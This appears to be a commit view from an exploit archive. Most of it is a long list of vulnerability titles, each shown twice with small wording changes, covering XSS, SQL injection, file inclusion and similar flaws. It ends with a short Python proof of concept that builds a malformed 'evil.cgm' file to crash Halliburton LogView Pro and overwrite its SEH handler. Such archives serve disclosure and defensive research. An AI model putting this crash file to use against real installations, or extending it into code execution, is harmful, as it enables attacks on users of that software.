PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities

Yandex.Server 2010 9.0 - 'text' Parameter Cross Site Scripting
Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting
phphq.Net phAlbum 1.5.1 - 'index.php' Cross Site Scripting
RuubikCMS 1.1.x - Cross Site Scripting / Information Disclosure / Directory Traversal
phphq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting
RuubikCMS 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal

AZ Photo Album - Cross Site Scripting / Arbitrary File Upload
AZ Photo Album - Cross-Site Scripting / Arbitrary File Upload

Nilehoster Topics Viewer 2.3 Multiple SQL Injection and Local File Inclusion
Nilehoster Topics Viewer 2.3 - Multiple SQL Injection and Local File Inclusion

AzDGDatingMedium 1.9.3 Multiple Remote Vulnerabilities
AzDGDatingMedium 1.9.3 - Multiple Remote Vulnerabilities

WHMCompleteSolution (WHMCS) 5.0 Multiple Application Function CSRF
WHMCompleteSolution (WHMCS) 5.0 - Multiple Application Function CSRF

VoipNow Professional 2.5.3 - 'nsextt' Parameter Cross Site Scripting
VoipNow Professional 2.5.3 - 'nsextt' Parameter Cross-Site Scripting

WeBid Multiple Cross Site Scripting And LDAP Injection Vulnerabilities
WeBid Multiple Cross-Site Scripting And LDAP Injection Vulnerabilities

Koha 3.20.1 - Multiple XSS and XSRF Vulnerabilities
Koha 3.20.1 - Multiple XSS / XSRF Vulnerabilities
XAMPP for Windows 1.7.7 - Multiple Cross Site Scripting / SQL Injection
SPIP 2.x Multiple Cross Site Scripting Vulnerabilities
XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injection
SPIP 2.x Multiple Cross-Site Scripting Vulnerabilities

Juniper Networks Mobility System Software 'aaa/wba_login.html' Cross Site Scripting
Juniper Networks Mobility System Software 'aaa/wba_login.html' Cross-Site Scripting

MediaWiki 1.x - 'uselang' Parameter Cross Site Scripting
MediaWiki 1.x - 'uselang' Parameter Cross-Site Scripting
Simple Document Management System 1.1.5 Multiple SQL Injection
Webify Multiple Products - Multiple HTML Injection and Local File Inclusion
Squiz CMS Multiple Cross Site Scripting and XML External Entity Injection Vulnerabilities
Simple Document Management System 1.1.5 - Multiple SQL Injection
Webify Multiple Products - Multiple HTML Injection / Local File Inclusion
Squiz CMS Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities

Mahara 1.4.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities
Mahara 1.4.1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities

Flogr 'tag' Parameter Multiple Cross Site Scripting Vulnerabilities
Flogr 'tag' Parameter Multiple Cross-Site Scripting Vulnerabilities

CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities
CMS Balitbang - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities

AdaptCMS 2.0.2 - 'index.php' Script Cross Site Scripting
AdaptCMS 2.0.2 - 'index.php' Script Cross-Site Scripting
web@all Cross Site Scripting
Commentics 'index.php' Cross Site Scripting
web@all Cross-Site Scripting
Commentics 'index.php' Cross-Site Scripting

Adiscan LogAnalyzer 3.4.3 Cross Site Scripting
Adiscan LogAnalyzer 3.4.3 Cross-Site Scripting

CMS Lokomedia Multiple Cross Site Scripting and HTML Injection Vulnerabilities
CMS Lokomedia - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

Phonalisa Multiple HTML-Injection Cross-Site Scripting
Phonalisa - Multiple HTML-Injection Cross-Site Scripting

FCKEditor Core - (Editor 'spellchecker.php') Cross Site Scripting
FCKEditor Core - (Editor 'spellchecker.php') Cross-Site Scripting

TEMENOS T24 Multiple Cross Site Scripting Vulnerabilities
TEMENOS T24 - Multiple Cross-Site Scripting Vulnerabilities

SWFUpload 'movieName' Parameter Cross Site Scripting
SWFUpload 'movieName' Parameter Cross-Site Scripting

Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities
Joomla 2.5.x Language Switcher ModuleMultiple Cross-Site Scripting Vulnerabilities

php MBB Cross Site Scripting and SQL Injection
php MBB Cross-Site Scripting and SQL Injection
WordPress SocialFit Plugin 'msg' Parameter Cross Site Scripting
WordPress custom tables Plugin 'key' Parameter Cross Site Scripting
WordPress SocialFit Plugin 'msg' Parameter Cross-Site Scripting
WordPress custom tables Plugin 'key' Parameter Cross-Site Scripting
WordPress Knews Multilingual Newsletters Plugin Cross Site Scripting
WordPress PHPFreeChat 'url' Parameter Cross Site Scripting
WordPress Knews Multilingual Newsletters Plugin Cross-Site Scripting
WordPress PHPFreeChat 'url' Parameter Cross-Site Scripting

MGB Multiple Cross Site Scripting and SQL Injection
MGB - Multiple Cross-Site Scripting / SQL Injection

Funeral Script PHP Cross Site Scripting and SQL Injection
Funeral Script PHP Cross-Site Scripting and SQL Injection

Simple Machines 2.0.2 Multiple HTML Injection Vulnerabilities
Simple Machines 2.0.2 - Multiple HTML Injection Vulnerabilities

web@all 'name' Parameter Cross Site Scripting
web@all 'name' Parameter Cross-Site Scripting

REDAXO 'subpage' Parameter Cross Site Scripting
REDAXO 'subpage' Parameter Cross-Site Scripting

Scrutinizer 9.0.1.19899 Multiple Cross Site Scripting Vulnerabilities
Scrutinizer 9.0.1.19899 - Multiple Cross-Site Scripting Vulnerabilities
phpBB Multiple SQL Injection
JW Player 'playerready' Parameter Cross Site Scripting
phpBB - Multiple SQL Injection
JW Player 'playerready' Parameter Cross-Site Scripting
Distimo Monitor Multiple Cross Site Scripting Vulnerabilities
ManageEngine Applications Manager Multiple Cross Site Scripting and SQL Injection
Distimo Monitor Multiple Cross-Site Scripting Vulnerabilities
ManageEngine Applications Manager Multiple Cross-Site Scripting and SQL Injection

ntop 'arbfile' Parameter Cross Site Scripting
ntop 'arbfile' Parameter Cross-Site Scripting
Zenoss 3.2.1 Multiple Security Vulnerabilities
Elefant CMS 'id' Parameter Cross Site Scripting
Worksforweb iAuto - Multiple Cross Site Scripting / HTML Injection Vulnerabilities
Zenoss 3.2.1 - Multiple Security Vulnerabilities
Elefant CMS 'id' Parameter Cross-Site Scripting
Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

PolarisCMS 'WebForm_OnSubmit()' Function Cross Site Scripting
PolarisCMS 'WebForm_OnSubmit()' Function Cross-Site Scripting

ConcourseSuite Multiple Cross Site Scripting and Cross Site Request Forgery Vulnerabilities
ConcourseSuite Multiple Cross-Site Scripting and Cross Site Request Forgery Vulnerabilities

Hotel Booking Portal 0.1 Multiple SQL Injection and Cross Site Scripting Vulnerabilities
Hotel Booking Portal 0.1 - Multiple SQL Injection / Cross-Site Scripting
Total Shop UK eCommerce CodeIgniter Multiple Cross Site Scripting Vulnerabilities
mIRC 'projects.php' Cross Site Scripting
MindTouch DekiWiki Multiple Remote and Local File Inclusion
Total Shop UK eCommerce CodeIgniter Multiple Cross-Site Scripting Vulnerabilities
mIRC 'projects.php' Cross-Site Scripting
MindTouch DekiWiki - Multiple Remote File Inclusion / Local File Inclusion

ShopperPress WordPress Theme - SQL Injection / Cross Site Scripting
ShopperPress WordPress Theme - SQL Injection / Cross-Site Scripting

LISTSERV 16 'SHOWTPL' Parameter Cross Site Scripting
LISTSERV 16 'SHOWTPL' Parameter Cross-Site Scripting
JPM Article Blog Script 6 'tid' Parameter Cross Site Scripting
SaltOS 'download.php' Cross Site Scripting
IBM Rational ClearQuest 8.0 Multiple Security Vulnerabilities
Jara 1.6 Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities
OrderSys 1.6.4 Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities
Banana Dance Cross Site Scripting and SQL Injection
JPM Article Blog Script 6 'tid' Parameter Cross-Site Scripting
SaltOS 'download.php' Cross-Site Scripting
IBM Rational ClearQuest 8.0 - Multiple Security Vulnerabilities
Jara 1.6 - Multiple SQL Injection and Multiple Cross-Site Scripting Vulnerabilities
OrderSys 1.6.4 - Multiple SQL Injection and Multiple Cross-Site Scripting Vulnerabilities
Banana Dance - Cross-Site Scripting / SQL Injection

SiNG cms 'password.php' Cross Site Scripting
SiNG cms 'password.php' Cross-Site Scripting
Monstra Multiple HTML Injection Vulnerabilities
KindEditor 'name' Parameter Cross Site Scripting
Monstra - Multiple HTML Injection Vulnerabilities
KindEditor 'name' Parameter Cross-Site Scripting
Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities
JW Player 'logo.link' Parameter Cross Site Scripting
Websense Content Gateway Multiple Cross-Site Scripting Vulnerabilities
JW Player 'logo.link' Parameter Cross-Site Scripting
Power-eCommerce Multiple Cross Site Scripting Vulnerabilities
WordPress Finder 'order' Parameter Cross Site Scripting
Power-eCommerce Multiple Cross-Site Scripting Vulnerabilities
WordPress Finder 'order' Parameter Cross-Site Scripting
LibGuides Multiple Cross Site Scripting Vulnerabilities
Mihalism Multi Host 'users.php' Cross Site Scripting
LibGuides Multiple Cross-Site Scripting Vulnerabilities
Mihalism Multi Host 'users.php' Cross-Site Scripting
Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities
PrestaShop 1.4.7 Multiple Cross Site Scripting Vulnerabilities
Phorum 5.2.18 - Multiple Cross-Site Scripting Vulnerabilities
PrestaShop 1.4.7 - Multiple Cross-Site Scripting Vulnerabilities

TomatoCart 'example_form.ajax.php' Cross Site Scripting
TomatoCart 'example_form.ajax.php' Cross-Site Scripting

Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities
Crowbar 'file' Parameter Multiple Cross-Site Scripting Vulnerabilities
phpFox 3.0.1 - 'ajax.php' Multiple Cross Site Scripting Vulnerabilities
Kayako Fusion 'download.php' Cross Site Scripting
phpFox 3.0.1 - 'ajax.php' Multiple Cross-Site Scripting Vulnerabilities
Kayako Fusion 'download.php' Cross-Site Scripting

Hawkeye-G 3.0.1.4912 - Persistent XSS & Information Leakage
Hawkeye-G 3.0.1.4912 - Persistent XSS / Information Leakage
LiteSpeed Web Server 'gtitle' parameter Cross Site Scripting
WordPress Slideshow Plugin Multiple Cross Site Scripting Vulnerabilities
LiteSpeed Web Server 'gtitle' parameter Cross-Site Scripting
WordPress Slideshow Plugin Multiple Cross-Site Scripting Vulnerabilities

Printer Pro 5.4.3 IOS - Persistent Cross Site Scripting
Printer Pro 5.4.3 IOS - Persistent Cross-Site Scripting

Flogr 'index.php' Multiple Cross Site Scripting Vulnerabilities
Flogr 'index.php' Multiple Cross-Site Scripting Vulnerabilities

ExtCalendar 2.0 Multiple SQL Injection and HTML Injection Vulnerabilities
ExtCalendar 2.0 - Multiple SQL Injection and HTML Injection Vulnerabilities

WordPress Download Monitor Plugin 'dlsearch' Parameter Cross Site Scripting
WordPress Download Monitor Plugin 'dlsearch' Parameter Cross-Site Scripting

Openfiler 2.3 Multiple Cross Site Scripting and Information Disclosure Vulnerabilities
Openfiler 2.3 - Multiple Cross-Site Scripting and Information Disclosure Vulnerabilities

Atlassian Confluence 3.4.x Error Page Cross Site Scripting
Atlassian Confluence 3.4.x Error Page Cross-Site Scripting

vBSEO 'u' parameter Cross Site Scripting
vBSEO 'u' parameter Cross-Site Scripting

minimal Gallery 'index.php' Multiple Cross Site Scripting Vulnerabilities
minimal Gallery 'index.php' Multiple Cross-Site Scripting Vulnerabilities

AxisInternet VoIP Manager Multiple Cross Site Scripting Vulnerabilities
AxisInternet VoIP Manager Multiple Cross-Site Scripting Vulnerabilities
WordPress Purity Theme Multiple Cross Site Scripting Vulnerabilities
Poweradmin 'index.php' Cross Site Scripting
WordPress MF Gig Calendar Plugin Cross Site Scripting
WordPress Purity Theme Multiple Cross-Site Scripting Vulnerabilities
Poweradmin 'index.php' Cross-Site Scripting
WordPress MF Gig Calendar Plugin Cross-Site Scripting

WordPress Video Lead Form Plugin 'errMsg' Parameter Cross Site Scripting
WordPress Video Lead Form Plugin 'errMsg' Parameter Cross-Site Scripting

YCommerce Multiple SQL Injection
YCommerce - Multiple SQL Injection

WordPress Token Manager Plugin 'tid' Parameter Cross Site Scripting
WordPress Token Manager Plugin 'tid' Parameter Cross-Site Scripting

Neturf eCommerce Shopping Cart 'SearchFor' Parameter Cross Site Scripting
Neturf eCommerce Shopping Cart 'SearchFor' Parameter Cross-Site Scripting

WordPress ABC Test Plugin 'id' Parameter Cross Site Scripting
WordPress ABC Test Plugin 'id' Parameter Cross-Site Scripting
WordPress Akismet Plugin Multiple Cross Site Scripting Vulnerabilities
Zenphoto 'admin-news-articles.php' Cross Site Scripting
WordPress Akismet Plugin Multiple Cross-Site Scripting Vulnerabilities
Zenphoto 'admin-news-articles.php' Cross-Site Scripting

Interspire Email Marketer - (Cross Site Scripting/HTML Injection/SQL Injection) Multiple Vulnerabilities
Interspire Email Marketer - (Cross-Site Scripting/HTML Injection/SQL Injection) Multiple Vulnerabilities

CMS Mini 0.2.2 - 'index.php' Script Cross Site Scripting
CMS Mini 0.2.2 - 'index.php' Script Cross-Site Scripting

WordPress Wordfence Security Plugin Cross Site Scripting
WordPress Wordfence Security Plugin Cross-Site Scripting
SMF 'view' Parameter Cross Site Scripting
Inventory Multiple Cross Site Scripting and SQL Injection
SMF 'view' Parameter Cross-Site Scripting
Inventory Multiple Cross-Site Scripting and SQL Injection

Gramophone 'rs' Parameter Cross Site Scripting
Gramophone 'rs' Parameter Cross-Site Scripting
WANem Multiple Cross Site Scripting Vulnerabilities
CorePlayer 'callback' Parameter Cross Site Scripting
WANem Multiple Cross-Site Scripting Vulnerabilities
CorePlayer 'callback' Parameter Cross-Site Scripting
NetCat CMS Multiple Cross Site Scripting Vulnerabilities
SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross Site Scripting
NetCat CMS Multiple Cross-Site Scripting Vulnerabilities
SolarWinds Orion IP Address Manager (IPAM) 'search.aspx' Cross-Site Scripting

bloofoxCMS 0.3.5 Multiple Cross Site Scripting Vulnerabilities
bloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities

WebKit Cross Site Scripting Filter 'XSSAuditor.cpp' Security Bypass
WebKit Cross-Site Scripting Filter 'XSSAuditor.cpp' Security Bypass
Elastix 'page' Parameter Cross Site Scripting
TinyMCPUK 'test' Parameter Cross Site Scripting
Elastix 'page' Parameter Cross-Site Scripting
TinyMCPUK 'test' Parameter Cross-Site Scripting

Multiple Fortinet FortiWeb Appliances Multiple Cross Site Scripting Vulnerabilities
Multiple Fortinet FortiWeb Appliances Multiple Cross-Site Scripting Vulnerabilities

PHP Address Book 'group' Parameter Cross Site Scripting
PHP Address Book 'group' Parameter Cross-Site Scripting

cPanel 'account' Parameter Cross Site Scripting
cPanel 'account' Parameter Cross-Site Scripting
WHM 'filtername' Parameter Cross Site Scripting
cPanel 'dir' Parameter Cross Site Scripting
WHM 'filtername' Parameter Cross-Site Scripting
cPanel 'dir' Parameter Cross-Site Scripting
Joomla! Incapsula Component Multiple Cross Site Scripting Vulnerabilities
WordPress NextGEN Gallery Plugin 'test-head' Parameter Cross Site Scripting
Joomla! Incapsula Component Multiple Cross-Site Scripting Vulnerabilities
WordPress NextGEN Gallery Plugin 'test-head' Parameter Cross-Site Scripting

Dell OpenManage Server Administrator Cross Site Scripting
Dell OpenManage Server Administrator Cross-Site Scripting

Quick.Cms/Quick.Cart Cross Site Scripting
Quick.Cms/Quick.Cart Cross-Site Scripting
Apache OFBiz 10.4.x Multiple Cross Site Scripting Vulnerabilities
Scripts Genie Classified Ultra - SQL Injection / Cross Site Scripting
Apache OFBiz 10.4.x Multiple Cross-Site Scripting Vulnerabilities
Scripts Genie Classified Ultra - SQL Injection / Cross-Site Scripting
Perforce P4Web Multiple Cross Site Scripting Vulnerabilities
gpEasy CMS 'section' Parameter Cross Site Scripting
Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities
gpEasy CMS 'section' Parameter Cross-Site Scripting
Novell Groupwise Client 8.0 Multiple Remote Code Execution Vulnerabilities
WordPress WP-Table Reloaded Plugin 'id' Parameter Cross Site Scripting
Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities
WordPress WP-Table Reloaded Plugin 'id' Parameter Cross-Site Scripting

WordPress CommentLuv Plugin '_ajax_nonce' Parameter Cross Site Scripting
WordPress CommentLuv Plugin '_ajax_nonce' Parameter Cross-Site Scripting
WordPress Audio Player Plugin 'playerID' Parameter Cross Site Scripting
WordPress Pinboard Theme 'tab' Parameter Cross Site Scripting
WordPress Audio Player Plugin 'playerID' Parameter Cross-Site Scripting
WordPress Pinboard Theme 'tab' Parameter Cross-Site Scripting

AbanteCart 'index.php' Multiple Cross Site Scripting Vulnerabilities
AbanteCart 'index.php' Multiple Cross-Site Scripting Vulnerabilities

Sonar Multiple Cross Site Scripting Vulnerabilities
Sonar Multiple Cross-Site Scripting Vulnerabilities

MIMEsweeper For SMTP Multiple Cross Site Scripting Vulnerabilities
MIMEsweeper For SMTP Multiple Cross-Site Scripting Vulnerabilities

Squirrelcart 'table' Parameter Cross Site Scripting
Squirrelcart 'table' Parameter Cross-Site Scripting

CKEditor 'posteddata.php' Cross Site Scripting
CKEditor 'posteddata.php' Cross-Site Scripting

WordPress Pretty Link Plugin Cross Site Scripting
WordPress Pretty Link Plugin Cross-Site Scripting
Zenphoto 'index.php' SQL Injection
PHPmyGallery 1.5 - Local File Disclosure / Cross Site Scripting
OpenEMR 'site' Parameter Cross Site Scripting
ZeroClipboard 1.9.x - 'id' Parameter Cross Site Scripting
Zenphoto - 'index.php' SQL Injection
PHPmyGallery 1.5 - Local File Disclosure / Cross-Site Scripting
OpenEMR 'site' Parameter Cross-Site Scripting
ZeroClipboard 1.9.x - 'id' Parameter Cross-Site Scripting
WordPress Smart Flv Plugin 'jwplayer.swf' Multiple Cross Site Scripting Vulnerabilities
Batavi 'index.php' Cross Site Scripting
WordPress Smart Flv Plugin 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities
Batavi 'index.php' Cross-Site Scripting
JForum 'jforum.page' Multiple Cross Site Scripting Vulnerabilities
Geeklog Cross Site Scripting
JForum 'jforum.page' Multiple Cross-Site Scripting Vulnerabilities
Geeklog Cross-Site Scripting

WordPress Uploader Plugin 'blog' Parameter Cross Site Scripting
WordPress Uploader Plugin 'blog' Parameter Cross-Site Scripting
HP Intelligent Management Center 'topoContent.jsf' Cross Site Scripting
WordPress Count Per Day Plugin 'daytoshow' Parameter Cross Site Scripting
HP Intelligent Management Center 'topoContent.jsf' Cross-Site Scripting
WordPress Count Per Day Plugin 'daytoshow' Parameter Cross-Site Scripting
Your Own Classifieds Cross Site Scripting
McAfee Vulnerability Manager - 'cert_cn' Parameter Cross Site Scripting
Your Own Classifieds Cross-Site Scripting
McAfee Vulnerability Manager - 'cert_cn' Parameter Cross-Site Scripting
SWFUpload Multiple Content Spoofing And Cross Site Scripting Vulnerabilities
Asteriskguru Queue Statistics 'warning' Parameter Cross Site Scripting
WordPress podPress Plugin 'playerID' Parameter Cross Site Scripting
SWFUpload Multiple Content Spoofing And Cross-Site Scripting Vulnerabilities
Asteriskguru Queue Statistics 'warning' Parameter Cross-Site Scripting
WordPress podPress Plugin 'playerID' Parameter Cross-Site Scripting

Petite Annonce Cross Site Scripting
Petite Annonce Cross-Site Scripting

WordPress ADIF Log Search Widget Plugin 'logbook_search.php' Cross Site Scripting
WordPress ADIF Log Search Widget Plugin 'logbook_search.php' Cross-Site Scripting

Jaow CMS 'add_ons' Parameter Cross Site Scripting
Jaow CMS 'add_ons' Parameter Cross-Site Scripting
IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross Site Scripting Vulnerabilities
OrionDB Web Directory Multiple Cross Site Scripting Vulnerabilities
WordPress Feedweb Plugin 'wp_post_id' Parameter Cross Site Scripting
C2 WebResource 'File' Parameter Cross Site Scripting
e107 - 'content_preset.php' Cross Site Scripting
IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities
OrionDB Web Directory Multiple Cross-Site Scripting Vulnerabilities
WordPress Feedweb Plugin 'wp_post_id' Parameter Cross-Site Scripting
C2 WebResource 'File' Parameter Cross-Site Scripting
e107 - 'content_preset.php' Cross-Site Scripting

Zimbra 'aspell.php' Cross Site Scripting
Zimbra 'aspell.php' Cross-Site Scripting
WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross Site Scripting
phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities
WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross-Site Scripting
phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross-Site Scripting Vulnerabilities

Dream CMS 2.3.0 - CSRF Add Extension And File Upload PHP Code Execution
Dream CMS 2.3.0 - CSRF Add Extension / File Upload PHP Code Execution

jPlayer 'Jplayer.swf' Script Cross Site Scripting
jPlayer 'Jplayer.swf' Script Cross-Site Scripting

Matrix42 Service Store 'default.aspx' Cross Site Scripting
Matrix42 Service Store 'default.aspx' Cross-Site Scripting

Crafty Syntax Live Help 3.1.2 - Remote File Inclusion and Path Disclosure
Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Path Disclosure

RealtyScript 4.0.2 - Multiple CSRF And Persistent XSS Vulnerabilities
RealtyScript 4.0.2 - Multiple CSRF / Persistent XSS Vulnerabilities

Cisco Linksys E4200 /apply.cgi Multiple Parameter XSS
Cisco Linksys E4200 /apply.cgi - Multiple Parameter XSS
MyBB Game Section Plugin 'games.php' Multiple Cross Site Scripting Vulnerabilities
Securimage 'example_form.php' Cross Site Scripting
WordPress Securimage-WP Plugin 'siwp_test.php' Cross Site Scripting
MyBB Game Section Plugin 'games.php' Multiple Cross-Site Scripting Vulnerabilities
Securimage 'example_form.php' Cross-Site Scripting
WordPress Securimage-WP Plugin 'siwp_test.php' Cross-Site Scripting

Jojo CMS 'search' Parameter Cross Site Scripting
Jojo CMS 'search' Parameter Cross-Site Scripting
Elastix Multiple Cross Site Scripting Vulnerabilities
Telaen 2.7.x Cross Site Scripting
Elastix Multiple Cross-Site Scripting Vulnerabilities
Telaen 2.7.x Cross-Site Scripting

WordPress Ambience Theme 'src' Parameter Cross Site Scripting
WordPress Ambience Theme 'src' Parameter Cross-Site Scripting

Xaraya Multiple Cross Site Scripting Vulnerabilities
Xaraya - Multiple Cross-Site Scripting Vulnerabilities

Nameko 'nameko.php' Cross Site Scripting
Nameko 'nameko.php' Cross-Site Scripting

Xorbin Analog Flash Clock 'widgetUrl' Parameter Cross Site Scripting
Xorbin Analog Flash Clock 'widgetUrl' Parameter Cross-Site Scripting

WordPress Xorbin Digital Flash Clock 'widgetUrl' Parameter Cross Site Scripting
WordPress Xorbin Digital Flash Clock 'widgetUrl' Parameter Cross-Site Scripting

WordPress Category Grid View Gallery Plugin 'ID' Parameter Cross Site Scripting
WordPress Category Grid View Gallery Plugin 'ID' Parameter Cross-Site Scripting

Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross Site Scripting
Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting
Mintboard Multiple Cross Site Scripting Vulnerabilities
miniBB SQL Injection and Multiple Cross Site Scripting Vulnerabilities
Mintboard Multiple Cross-Site Scripting Vulnerabilities
miniBB SQL Injection and Multiple Cross-Site Scripting Vulnerabilities

WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities
WordPress Pie Register Plugin 'wp-login.php' Multiple Cross-Site Scripting Vulnerabilities

Corda .NET Redirector 'redirector.corda' Cross Site Scripting
Corda .NET Redirector 'redirector.corda' Cross-Site Scripting

Apache Struts 2.2.3 Multiple Open Redirection Vulnerabilities
Apache Struts 2.2.3 - Multiple Open Redirection Vulnerabilities

YardRadius Multiple Local Format String Vulnerabilities
YardRadius - Multiple Local Format String Vulnerabilities
WordPress FlagEm Plugin 'cID' Parameter Cross Site Scripting
Magnolia CMS Multiple Cross Site Scripting Vulnerabilities
WordPress Duplicator Plugin Cross Site Scripting
WordPress FlagEm Plugin 'cID' Parameter Cross-Site Scripting
Magnolia CMS Multiple Cross-Site Scripting Vulnerabilities
WordPress Duplicator Plugin Cross-Site Scripting

AlienVault Open Source SIEM (OSSIM) - Multiple Cross Site Scripting Vulnerabilities
AlienVault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities

AlgoSec Firewall Analyzer Cross Site Scripting
AlgoSec Firewall Analyzer Cross-Site Scripting

DotNetNuke 6.1.x Cross Site Scripting
DotNetNuke 6.1.x Cross-Site Scripting

Bo-Blog 2.1.1 Cross Site Scripting and SQL Injection
Bo-Blog 2.1.1 - Cross-Site Scripting / SQL Injection

Netwin SurgeFTP Sever 23d6 - Stored Cross Site Scripting
Netwin SurgeFTP Sever 23d6 - Stored Cross-Site Scripting

Oracle Glassfish Server 2.1.1/3.0.1 Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access
Oracle Glassfish Server 2.1.1/3.0.1 - Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access

Bugzilla 'editflagtypes.cgi' Multiple Cross Site Scripting Vulnerabilities
Bugzilla 'editflagtypes.cgi' Multiple Cross-Site Scripting Vulnerabilities

Course Registration Management System Cross Site Scripting and SQL Injection
Course Registration Management System Cross-Site Scripting and SQL Injection

WordPress Plugin WP Easy Poll 1.1.3 - XSS and CSRF
WordPress Plugin WP Easy Poll 1.1.3 - XSS / CSRF

Dell Kace 1000 Systems Management Appliance DS-2014-001 Multiple SQL Injection
Dell Kace 1000 Systems Management Appliance DS-2014-001 - Multiple SQL Injection

Rhino Cross Site Scripting and Password Reset Security Bypass Vulnerabilities
Rhino Cross-Site Scripting and Password Reset Security Bypass Vulnerabilities

Maian Uploader 4.0 Multiple Security Vulnerabilities
Maian Uploader 4.0 - Multiple Security Vulnerabilities

Singapore 0.9.9 b beta - Image Gallery Remote File Inclusion / Cross Site Scripting
Singapore 0.9.9 b beta - Image Gallery Remote File Inclusion / Cross-Site Scripting

ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities
ATutor - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities

Xangati /servlet/MGConfigData Multiple Parameter Remote Path Traversal File Access
Xangati /servlet/MGConfigData - Multiple Parameter Remote Path Traversal File Access

ZamFoo Multiple Remote Command Execution Vulnerabilities
ZamFoo - Multiple Remote Command Execution Vulnerabilities

WordPress DZS-VideoGallery Plugin - Cross Site Scripting / Command Injection
WordPress DZS-VideoGallery Plugin - Cross-Site Scripting / Command Injection
Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption
Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption 2
Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption (1)
Adobe Photoshop CC & Bridge CC PNG File Parsing Memory Corruption (2)

Chamilo LMS - Persistent Cross Site Scripting
Chamilo LMS - Persistent Cross-Site Scripting

WordPress Site Import Plugin 1.0.1 - Local and Remote File Inclusion
WordPress Site Import Plugin 1.0.1 - Local File Inclusion / Remote File Inclusion

PHP 5.5.33 / <= 7.0.4 - SNMP Format String Exploit
PHP 5.5.33 / 7.0.4 - SNMP Format String Exploit

CMS Made Simple < 2.1.3 & < 1.12.1 - Web Server Cache Poisoning
CMS Made Simple < 2.1.3 / < 1.12.1 - Web Server Cache Poisoning

ImageMagick 6.9.3-9 / <= 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)
ImageMagick 6.9.3-9 / 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)

ImageMagick 6.9.3-9 / <= 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)
ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick)

Windows - Functional Keylogger to File Null Free Shellcode  (601 (0x0259) bytes)
Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes)

iBilling 3.7.0 - Stored and Reflected XSS
iBilling 3.7.0 - Stored XSS / Reflected XSS

CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter + ASLR bypass)
CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter + ASLR Bypass)
WordPress Booking Calendar Plugin 6.2 - SQL Injection
WordPress WP Live Chat Support Plugin 6.2.03 - Stored XSS
WordPress ALO EasyMail Newsletter Plugin 2.9.2 - (Add/Import Arbitrary Subscribers) CSRF
Halliburton LogView Pro 9.7.5 - (.cgm/.tif/.tiff/.tifh) Crash PoC
2016-08-02 05:08:00 +00:00

26 lines
641 B
Python
Executable file

# Exploit Title: [Halliburton LogView Pro v9.7.5]
# Exploit Author: [Karn Ganeshen]
# Download link: [http://www.halliburton.com/public/lp/contents/Interactive_Tools/web/Toolkits/lp/Halliburton_Log_Viewer.exe]
# Version: [Current version 9.7.5]
# Tested on: [Windows Vista Ultimate SP2]
#
# Open cgm/tif/tiff/tifh file -> program crash -> SEH overwritten
#
# SEH chain of main thread
# Address SE handler
# 0012D22C kernel32.76B6FEF9
# 0012D8CC 42424242
# 41414141 *** CORRUPT ENTRY ***
#
#!/usr/bin/python
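# Output file; the same crash is reported for .cgm, .tif, .tiff and .tifh files.
filename = "evil.cgm"
# 804 "A" bytes of filler, then 4 "B" bytes that end up as the SE handler
# (the 42424242 entry in the SEH chain above).
buffer = "A"*804 + "B"*4
# The context manager closes the file even if the write fails.
with open(filename, 'w') as f:
    f.write(buffer)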
# +++++